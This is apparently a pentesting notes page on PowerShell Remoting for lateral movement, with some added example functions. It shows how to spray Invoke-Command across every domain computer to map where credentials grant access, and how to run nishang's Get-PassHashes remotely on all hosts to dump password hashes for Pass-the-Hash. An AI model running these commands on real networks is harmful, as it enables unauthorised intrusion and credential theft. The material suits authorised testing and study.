Pentesting Articles and Notes

PowerShell Remoting

Instead of having to connect to a workstation from outside the network every time we want to execute commands, if we are already in a PowerShell session we can either start a new session on the target box or issue commands to the target remotely from the session we are already in.

Executing commands this way is less noisy, of course. You can run scripts or locally loaded functions from your current workstation against your target remotely. If you have the privileges, you can even issue one statement to multiple targets in the network at once (fan-out remoting).

You may have to enable remoting (Enable-PSRemoting) on your workstation if PSRemoting is not already enabled; doing so requires Administrator privileges.

This works excellently in conjunction with Pass-the-Hash.

Some of these commands will require PowerView.
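
Before remoting anywhere it is worth checking that the local WinRM service and listener exist and that the target actually answers WS-Man requests. The function below is an added example, not code from the original page; the host name WS01 is a placeholder.

```powershell
# Added example (not from the original page): check that WinRM/PSRemoting is
# usable on this box and that the target answers, before trying to remote.
function Test-RemotingReady {
    param([Parameter(Mandatory)][string]$Target)   # $Target: hypothetical host name

    $result = [ordered]@{
        Target        = $Target
        LocalWinRM    = (Get-Service -Name WinRM -ErrorAction SilentlyContinue).Status
        LocalListener = $false
        TargetWSMan   = $false
        Error         = $null
    }

    # Enable-PSRemoting creates a WinRM listener (HTTP on 5985 by default). No
    # listener usually means remoting was never enabled here, which needs an
    # elevated shell to fix. The WSMan: drive errors if the service is stopped,
    # so the lookup is wrapped.
    $result.LocalListener = [bool]$(
        try { Get-ChildItem -Path WSMan:\localhost\Listener -ErrorAction Stop } catch { $null }
    )

    try {
        # Test-WSMan sends an Identify request to the target's WinRM service;
        # it does not authenticate, so it only proves the service is reachable.
        $null = Test-WSMan -ComputerName $Target -ErrorAction Stop
        $result.TargetWSMan = $true
    } catch {
        $result.Error = $_.Exception.Message
    }

    [pscustomobject]$result
}

Test-RemotingReady -Target 'WS01'   # WS01 is a placeholder host name
```

A false TargetWSMan with an error mentioning the RPC server or a timeout usually means WinRM is not enabled on the target or port 5985/5986 is filtered, not that your credentials are wrong; authentication is only exercised by the session cmdlets that follow.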

Storing Credentials into the Session

  • Method 1: Using the Get-Credential cmdlet from a remote desktop:

$cred = Get-Credential <user>  # then enter the password in the popup
  • Method 2: Using the New-Object cmdlet:

$user = '<user>'
$pwd = '<password>'
$secure_pwd = $pwd | ConvertTo-SecureString -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList $user, $secure_pwd
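
Method 2 has a side effect worth knowing: the plaintext password typed into $pwd ends up in PSReadLine history and in any transcript that is running. The function below is an added example, not from the original page, and shows how to build the same PSCredential object from a masked prompt so the password never sits in a string variable. The account name corp\jdoe is a placeholder.

```powershell
# Added example (not from the original page): build a PSCredential without
# the plaintext password appearing on the command line, in history, or in
# a transcript, which is what ConvertTo-SecureString -AsPlainText leaks.
function New-PromptedCredential {
    param([Parameter(Mandatory)][string]$UserName)

    # Read-Host -AsSecureString masks the input and returns a SecureString
    # directly, so there is never a plaintext string to convert.
    $securePwd = Read-Host -Prompt "Password for $UserName" -AsSecureString

    New-Object System.Management.Automation.PSCredential -ArgumentList $UserName, $securePwd
}

$cred = New-PromptedCredential -UserName 'corp\jdoe'   # placeholder account

# $cred now works with every -Credential parameter used later on this page.
```

Get-Credential achieves the same thing when a GUI or console prompt is available; the prompted variant above is useful in shells where the popup cannot be displayed.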

Begin a New Session on Another Workstation

Enter-PSSession -ComputerName <computer>

Running a Stateful Session and Then Entering It

$sess = New-PSSession -ComputerName <computer> [-Credential $cred]
Enter-PSSession -Session $sess

Executing Commands Remotely on Another Workstation

Invoke-Command -ComputerName <computer> -ScriptBlock {<command>}
Invoke-Command -Session $sess -ScriptBlock {<command>}

Spraying Computers to See Where You Have Access

Invoke-Command -ScriptBlock {hostname;whoami} -Credential $cred -ComputerName (Get-NetComputer)
  • My little script is a bit cleaner...

foreach ($comp in Get-NetComputer) {
    $comp + ' : ' + (Invoke-Command -ScriptBlock {whoami} -ComputerName $comp 2>$null)
}
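
The loop above contacts one host at a time and mixes successes and silent failures into one string. The function below is an added example, not code from the original page: it lets Invoke-Command fan out in parallel, keeps the PSComputerName that the remoting layer stamps on every returned object, and reports unreachable hosts explicitly. Get-NetComputer is PowerView's cmdlet, and $cred is the credential object built earlier.

```powershell
# Added example (not from the original page): the same access check as the
# loop above, returning one object per host instead of concatenated strings.
function Get-RemoteAccessMap {
    param(
        [Parameter(Mandatory)][string[]]$ComputerName,
        [pscredential]$Credential,
        [int]$ThrottleLimit = 16
    )

    $params = @{
        ComputerName  = $ComputerName
        ThrottleLimit = $ThrottleLimit        # Invoke-Command fans out in parallel
        ErrorAction   = 'SilentlyContinue'    # a refused host simply returns nothing
        ScriptBlock   = {
            # Runs on each target; whoami equivalent without spawning a process.
            [pscustomobject]@{
                User = [Security.Principal.WindowsIdentity]::GetCurrent().Name
            }
        }
    }
    if ($Credential) { $params.Credential = $Credential }

    # Every object that comes back carries PSComputerName, added by remoting.
    $reached = @(Invoke-Command @params)

    foreach ($c in $ComputerName) {
        $hit = $reached | Where-Object PSComputerName -eq $c | Select-Object -First 1
        [pscustomobject]@{
            Computer = $c
            Access   = [bool]$hit
            User     = if ($hit) { $hit.User } else { $null }
        }
    }
}

# Usage (Get-NetComputer from PowerView, $cred from the credential section):
# Get-RemoteAccessMap -ComputerName (Get-NetComputer) -Credential $cred | Format-Table
```

Because the object output is structured, the result can be filtered (Where-Object Access) or exported with Export-Csv instead of being read off the screen.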

Executing Scripts Remotely

Invoke-Command -FilePath <C:\path\to\script> -ComputerName <computer> [-Credential $cred]
  • You can spray this command across other workstations at once as well:

Invoke-Command -FilePath <C:\path\to\script> -ComputerName (Get-NetComputer)

Execute Locally Loaded Functions on Remote Machines

# Using Get-PassHashes.ps1 from nishang as an example
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-NetComputer) [-ArgumentList <args>] [-Credential $cred] 2>$null

Copying Files Remotely

Copy-Item -ToSession $sess -Path C:\local\path\to\file -Destination C:\destination\path
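
The pieces above (a stateful session, a locally loaded function run through ${function:...}, and Copy-Item against that session) fit together into one workflow. The block below is an added example, not code from the original page: it defines a harmless inventory function locally, runs it on the target through the session, pulls the file it wrote back with Copy-Item -FromSession, and closes the session. WS01, the file paths and the function name are placeholders; $cred is the credential object built earlier.

```powershell
# Added example (not from the original page): one session used end to end.

# A locally defined function; nothing on the target needs to exist beforehand.
function Get-HostSummary {
    param([string]$OutFile)   # positional, so it maps to -ArgumentList below
    $os = Get-CimInstance -ClassName Win32_OperatingSystem
    $summary = [pscustomobject]@{
        Host     = $env:COMPUTERNAME
        OS       = $os.Caption
        LastBoot = $os.LastBootUpTime
        User     = [Security.Principal.WindowsIdentity]::GetCurrent().Name
    }
    if ($OutFile) { $summary | Export-Csv -Path $OutFile -NoTypeInformation }
    $summary
}

# Stateful session; variables and modules loaded inside it persist between calls.
$sess = New-PSSession -ComputerName 'WS01' -Credential $cred   # WS01 is a placeholder

# ${function:Name} ships only this function's body. Any helper it calls would
# have to be sent the same way or defined inside it.
Invoke-Command -Session $sess -ScriptBlock ${function:Get-HostSummary} `
    -ArgumentList 'C:\Windows\Temp\summary.csv'     # placeholder remote path

# Copy-Item works in both directions against a session; -ToSession is shown
# above, -FromSession retrieves the file the function just wrote.
Copy-Item -FromSession $sess -Path 'C:\Windows\Temp\summary.csv' `
    -Destination "$env:TEMP\WS01-summary.csv"

# Close the session; otherwise it lingers on the target until its idle timeout.
Remove-PSSession -Session $sess
```

Objects returned through Invoke-Command are deserialized copies, so the summary you get back has the same properties but none of the original type's methods; if you need to process it further, do so on the remote side inside the script block.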

Last updated 3 years ago